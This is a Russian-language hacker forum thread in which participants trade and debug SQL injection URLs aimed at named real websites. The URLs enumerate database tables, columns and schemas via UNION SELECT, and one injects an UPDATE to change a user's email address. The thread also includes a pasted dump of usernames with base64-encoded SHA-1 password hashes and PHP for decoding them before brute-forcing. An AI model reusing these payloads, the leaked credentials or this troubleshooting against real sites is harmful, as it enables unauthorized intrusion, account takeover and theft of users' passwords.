ваще странно, тут права рута http://www.filmthreat.com/index.php?section=reviews&Id=9999999999999'/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+and+update+users+set+email='[email protected]'+where+username='jdeagnon'/* вылетает ошибка. ' - не фильтруется бывает
не придумывайте, если инъекция в select запросе, то в мускуле никакие update и иже с ними не используешь зы про grant вобще отжиг
Во, Скиппи за Велю )))))).Теперь как всегда вопрос : Нашёл скулю(с кем не бывает,по сто за день: )). Нашёл таблички: http://www.mooreindhardware.com/products.php?id=-5+union+select+1,2,table_name,4+from+information_schema.tables-- Нашёл колонки: http://www.mooreindhardware.com/products.php?id=-5+union+select+1,2,column_name,4+from+information_schema.columns-- К Mysql.user закрыт доступ, ибо не руткинс). И ещё: как выполнить запросы,чтобы к конкретной таблице показать конкретные колонки ?(а то хрен разберёшь)). Там цифры стоят возле каждой таблицы (4 или 2 2 2 2 2 2 )Я так понял,это количество полей в каждой таблице. А запрос похожий видел такой : -1+union+select+1,2,table_name,4+from+information_schema.tables+where+column_name=login_id-- (Бред какой-то имхо) ( Интересует, почему нету последних таблиц tbmember и tblogin(долго парился,перебирая имена).Таблицы с префиксом tbl существуют, но колонки от них не подходят(я не все перебрал).Просто колонка member_id по логике должна быть в tbmember. Что за бред?! (
Велемир из твоего поста понял процентов 10, а вообще: такого запроса ты видеть не мог, т.к он нарушает синтаксис, очевидно login_id должно быть в hex либо к кавычках при маджик_квотс_гпс= Офф column_name+from+information_schema.columns+where+table_name=hex(что -то) Врят ли это колличество полей в таблице xD, видмо просто принтабельные колонки
Ну а почему тогда tbmember,tblogin не существуют - это не таблицы чтоли ?(. Кстати, если выполнить как ты сказал hex(abrakadabra), где абракадабра - имя таблицы,то вернёт 'Item comming soon',а если выполнить запрос сразу *хексанутый*, то выведет : http://www.mooreindhardware.com/products.php?id=-1+union+select+1,2,column_name,4+from+information_schema.columns+where+table_name=0x74626C5F70686F746F67616C6C657279-- 0x74626C5F70686F746F67616C6C657279 - это tbl_photogallery. P.S: При запросе http://www.mooreindhardware.com/products.php?id=-1+union+select+1,2,column_name,4+from+information_schema.columns+where+table_name=0x74626C6F67696E-- ,где 0x74626C6F67696E - это tbmember, вернуло поля login_id,login,password,user_name,access_level Но при запросе http://www.mooreindhardware.com/products.php?id=-1+union+select+1,2,user_name,4+from+tblogin-- Выдаёт,что таблица не найдена. Как тут быть ?( В Hex пробывал
Велемир Когда ты прочитаешь хоть одну статью по скулям? Эта таблица в другой базе И предполагая твой следующий вопрос: база test_sql Вот вывод всех баз: _http://www.mooreindhardware.com/products.php?id=-5+union+select+1,2,schema_name,3+from+information_schema.schemata--
Передал параметру одного из сайтов -1+union+select+1,2,3,4,5-- Выдало ошибку : Microsoft OLE DB Provider for SQL Server error '80040e07' Operand type clash: ntext is incompatible with int /news/index.asp, line 20 Кроме как cast в голову ничё не приходит. Читал, что взломать можно только сайты с ошибками 80040e14(*идеальная ошибка*).Неужели это так? ( Так мало сайтов тогда уязвимы чтоли Ж( Предварительно подобрал количество полей. Да и вот ещё что : попадает ли под красивый запрос такая хрень ? : Warning: mssql_query(): message: Conversion failed when converting the nvarchar value '-1 order by 1000--' to data type int. (severity 16) in *какой-то путь к скрипту* on line 17 Вот ещё ошибка при выборе из бд - Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the varchar value 'Òàê è æèâåì' to a column of data type int. /index.asp, line 50 Как преобразовать нормально?)
HTML: 11099 PkdTSrZ22Jp9HBzYgkJ2yk8nEWI= membel 9Qu39+nMMEM3kwc1Pb4882N3kt8= koliaxtx O9yXyh2aY2gj2ExrnFhec93nGpE= 1401 lCOPqkIxlJ637ZxppwwLZ0r5JUA= 15valera15 4VQ2ikpjLNsxVM5jC5jNZD0Xr3o= 16valera16 4VQ2ikpjLNsxVM5jC5jNZD0Xr3o= 19630812 8I2BsLabPCh3DKL7U6z6dlRWfAM= 1lakosta1 hMCldvvsnfyE7bUkzRAIY7ks5R4= 1niger1 zSAcOz7JBqXyFEYnaa9qYyMgfQo= 2008 /D9xitkeYMLqfvGQ9NBpaPBSAPU= 777 /HpzTbpRjwMmCN/rBPTut58CWqc= 888 6qZ/OpPQrLCNil6P+YZvUZg7PDs= 999 r8l+oTH9fiaVqY7zQBNgj5fzTh0= 000 iu+wbEJuB6CmcaHiSItIWNaUpzA= Вот тут ЛОгин --- ПАСС Теоритечески можно узнать пароли ?
$a = base64_decode('iu+wbEJuB6CmcaHiSItIWNaUpzA='); $b = unpack('H*',$a); echo $b; И нада брутить SHA-1 хэш
http://www.donland.ru/news.asp?Id=-1+union+select+top+1+cast(column_name+as+nvarchar),2,3,4,5,6,7,8,9,10+from+information_schema.columns-- Хули не выходит ((